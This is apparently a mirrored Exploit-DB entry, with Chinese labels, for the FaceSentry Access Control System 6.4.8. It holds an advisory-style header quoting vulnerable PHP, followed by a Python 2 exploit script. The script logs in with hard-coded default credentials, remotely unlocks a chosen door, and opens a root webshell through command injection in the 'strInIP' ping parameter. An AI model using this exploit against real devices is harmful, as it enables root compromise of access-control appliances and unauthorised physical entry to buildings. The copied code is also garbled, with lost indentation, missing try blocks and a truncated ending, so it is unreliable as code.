FaceSentry Access Control System 6.4.8 – Remote Root Exploit

  • 作者: LiquidWorm
    日期: 2019-07-01
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/47066/
  • #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # FaceSentry Access Control System 6.4.8 Remote Root Exploit
    # Vendor: iWT Ltd.
    # Product web page: http://www.iwt.com.hk
    # Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
    # Firmware 5.7.2 build 568 (Algorithm A14)
    # Firmware 5.7.0 build 539 (Algorithm A14)
    # Summary: FaceSentry 5AN is a revolutionary smart identity
    # management appliance that offers entry via biometric face
    # identification, contactless smart card, staff ID, or QR-code.
    # The QR-code upgrade allows you to share an eKey with guests
    # while you're away from your Office and monitor all activity
    # via the web administration tool. Powered by standard PoE
    # (Power over Ethernet), FaceSEntry 5AN can be installed in
    # minutes with only 6 screws. FaceSentry 5AN is a true enterprise
    # grade access control or time-and-attendance appliance.
    # Desc: FaceSentry suffers from an authenticated OS command
    # injection vulnerability using default credentials. This can
    # be exploited to inject and execute arbitrary shell commands
    # as the root user via the 'strInIP' POST parameter in pingTest
    # PHP script.
    # ==============================================================
    # /pingTest.php:
    # --------------
    # 8:if (!isAuth('TestTools','R')){
    # 9:echo "No Permission";
    # 10: include("footer.php");
    # 11: exit;
    # 12:}
    # 13:
    # 14: if(isset($_POST["strInIP"])){
    # 15: $strInIP = $_POST["strInIP"];
    # 16: }else{
    # 17: $strInIP = "";
    # 18: }
    # 19:
    # 20: $strOperationResult = "";
    # 21: if ($strInIP != ""){
    # 22:
    # 23:$out = array(); 
    # 24:exec("sudo ping -c 4 $strInIP",$out);
    # 25:$result = "";
    # 26:foreach($out as $line){
    # 27:$result = $result.$line."<br>";
    # 28:}
    # ==============================================================
    # Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
    #Linux 3.4.113-sun8i (armv7l)
    #Armbian 5.38
    #Sunxi Linux (sun8i generation)
    #Orange Pi PC +
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    # Advisory ID: ZSL-2019-5525
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php
    # 28.05.2019
    import datetime########INITIALIZE
    import urllib2#########BIOMETRICS
    import urllib##########FACIAL.REC
    import time############OGNITION.S
    import sys##(.)###(.)##YSTEM.DOOR
    import re#######O######UNLOCKED.A
    import os#######_######CCESS.GRAN
    import io######(_)#####TED.0B1000
    import py##############1.11111011
    from cookielib import CookieJar
    global pajton
    pajton = os.path.basename(sys.argv[0])
    def usage():
    if len(sys.argv) < 2:
    print '[+] Usage: ./' + pajton + ' <ip>\n'
    def auth():
    brojac = 0
    usernames = [ 'admin', 'user', 'administrator' ] # case sensitive
    passwords = [ '123', '123', '123456' ]
    while brojac < 3:
    podatoci = { 'strInLogin': usernames[brojac],
     'strInPassword' : passwords[brojac],
     'saveLogin' : '1',
     'saveFor' : '168' } # 7 days
    print '[+] Trying creds ' + usernames[brojac] + ':' + passwords[brojac]
    nesto_encode = urllib.urlencode(podatoci)
    ajde.open('http://' + target + '/login.php', nesto_encode)
    check = ajde.open('http://' + target + '/sentryInfo.php')
    dool = re.search(r'Hardware Key', check.read())
    if dool:
    print '[+] That worked!'
    brojac += 1
    if brojac == 3:
    print '[!] Ah ah ah. You didn\'t say the magic word!'
    def door():
    unlock = raw_input('[*] Unlock door No.: ') # default door number = 0
    br = int(unlock)
    panel = { 'strInAction' : 'openDoor',
    'strInPanelNo': br,
    'strInRestartAction': '',
    'strPanelIDRestart' : '',
    'strPanelRestartAction' : '' }
    nesto_encode = urllib.urlencode(panel)
    ajde.open('http://' + target + '/openDoor.php', nesto_encode)
    print '[+] Door ' + unlock + ' is unlocked!'
    except ValueError:
    print '[!] Only values from 0 to 8 are valid.'
    def main():
    if os.name == 'posix':
    if os.name == 'nt':
    vremetodeneska = datetime.datetime.now()
    kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')
    print 'Starting exploit at ' + kd
    print '''
    ──FaceSentry Access Control System
    ────────Remote Root Exploit
    ─────────Zero Science Lab
    tegla = CookieJar()
    global ajde, target
    target = sys.argv[1]
    ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))
    raw_input('\n[*] Press [ENTER] to land... ')
    print '[+] Entering interactive (web)shell...'
    while True:
    cmd = raw_input('root@facesentry:~# ')
    if 'exit' in cmd.strip():
    print '[+] Take care now, bye bye then!'
    if 'door' in cmd.strip():
    podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd
    nesto_encode = urllib.urlencode(podatoci)
    r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)
    pattern = re.search(cmd+'\)<[^>]*>(.*?)</font>', r_izraz.read())
    x = pattern.groups()[0].strip()
    y = x.replace('<br>', '\n')
    print y.strip()
    except Exception as i:
    print '[-] Error: ' + i.message
    except KeyboardInterrupt as k:
    print '\n[+] Interrupter!'
    if __name__ == "__main__":